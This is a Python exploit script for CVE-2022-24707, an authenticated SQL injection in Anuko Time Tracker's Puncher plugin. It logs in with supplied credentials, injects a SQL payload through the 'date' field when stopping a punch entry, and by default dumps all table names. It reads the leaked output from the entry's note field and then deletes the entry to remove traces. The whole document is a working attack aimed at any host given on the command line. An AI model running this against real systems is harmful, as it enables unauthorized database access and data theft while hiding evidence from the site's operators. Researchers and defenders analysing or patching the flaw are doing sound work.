# Exploit Title: Anuko Time Tracker - SQLi (Authenticated) # Date: 2022-05-03 # Exploit Author: Altelus # Vendor Homepage: https://www.anuko.com/ # Software Link: https://github.com/anuko/timetracker/tree/0924ef499c2b0833a20c2d180b04fa70c6484b6d # Version: Anuko Time Tracker # Tested on: Linux # CVE : CVE-2022-24707 # An authenticated user can exploit an SQL Injection vulnerability on the Puncher plugin if its enabled. # User has to start the puncher and stop it but upon stopping an additional parameter 'date' must be passed. # The 'date' parameter is then injected with SQL payload for leaking database contents. from time import time import requests import argparse import re from bs4 import BeautifulSoup from datetime import datetime, timedelta def get_puncher_page(): punch_txt = r_client.get(host + "/puncher.php").text if "Feature is disabled" in punch_txt: print("[-] Puncher feature is disabled.") exit(0) print("[+] Puncher feature is enabled. Picking a project...") soup = BeautifulSoup(punch_txt, features="lxml") time_record_form = soup.find("select", {"name" : "project", "id" : "project"}) project_list = time_record_form.findAll("option") if len(project_list) <= 1: print("[-] No project to choose from") exit(0) f_proj = project_list[1] print("[*] Picking the first project in the option: [{} - {}]".format(f_proj['value'], f_proj.text)) return f_proj['value'] def login(username, password): global r_client data = { "login" : username, "password" : password, "btn_login" : "Login", } login_txt = r_client.post(host + "/login.php", data=data).text if "Incorrect" in login_txt: print("[-] Failed to login. Credentials are not correct.") exit(0) print("[+] Login successful!") def start_puncher(project_id): global r_client data = { "project": project_id, "btn_start": "Start", "browser_today" : "", "browser_time" : "04:00", "date": "{}-{}-{}".format(date.year, date.month, date.day) } headers = { "Referer" : host + "/puncher.php" } start_p = r_client.post(host + "/puncher.php", data=data, headers=headers).text if "Uncompleted entry already" in start_p: print("[-] A running puncher entry is seen. Exiting") exit(0) print("[*] Puncher started. Getting id added...") puncher_p = r_client.get(host + "/puncher.php?date={}-{}-{}".format(date.year, date.month, date.day)).text time_edit_ids = re.findall("time_edit.php\?id=\d+",puncher_p) time_edit_ids.sort() latest_id = time_edit_ids[-1].split("=")[1] return latest_id def stop_puncher_sqli(project_id, sqli=""): get_all_tables = "SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()" if sqli == "": sqli = get_all_tables new_date = date+timedelta(minutes=10) data = { "btn_stop": "Stop", "browser_today" : "", "browser_time" : "04:10", "date": "{}-{}-{}', comment=(({})), date='{}-{}-{}".format(date.year, date.month, date.day, sqli, date.year, date.month, date.day) } headers = { "Referer" : host + "/puncher.php" } stop_p = r_client.post(host + "/puncher.php", data=data, headers=headers,allow_redirects=False).text print("[*] Puncher stopped") def get_puncher_result(puncher_id): time_edit_p = r_client.get(host + "/time_edit.php?id={}".format(puncher_id)).text soup = BeautifulSoup(time_edit_p, features="lxml") note_content = soup.find("textarea", {"name" : "note", "id" : "note"}) print("[+] Leaked: {}".format(note_content.text)) def delete_puncher_entry(puncher_id): data = { "delete_button" : "Delete", "id" : puncher_id } headers = { "Referer" : "{}".format(puncher_id) } del_p = r_client.post(host + "/time_delete.php?id={}".format(puncher_id), data=data, headers=headers) print("[*] Puncher {} deleted".format(puncher_id)) parser = argparse.ArgumentParser() parser.add_argument('--username', required=True, help="Anuko Timetracker username") parser.add_argument('--password', required=True, help="Anuko Timetracker password") parser.add_argument('--host', required=True, help="e.g. http://target.website.local,,") parser.add_argument('--sqli', required=False, help="SQL query to run. Defaults to getting all tables") args = parser.parse_args() r_client = requests.Session() host = args.host date = datetime.now() username = args.username password = args.password login(username, password) proj_id = get_puncher_page() puncher_id = start_puncher(proj_id) sqli="" if args.sqli != None: sqli = args.sqli stop_puncher_sqli(proj_id, sqli=sqli) get_puncher_result(puncher_id) delete_puncher_entry(puncher_id)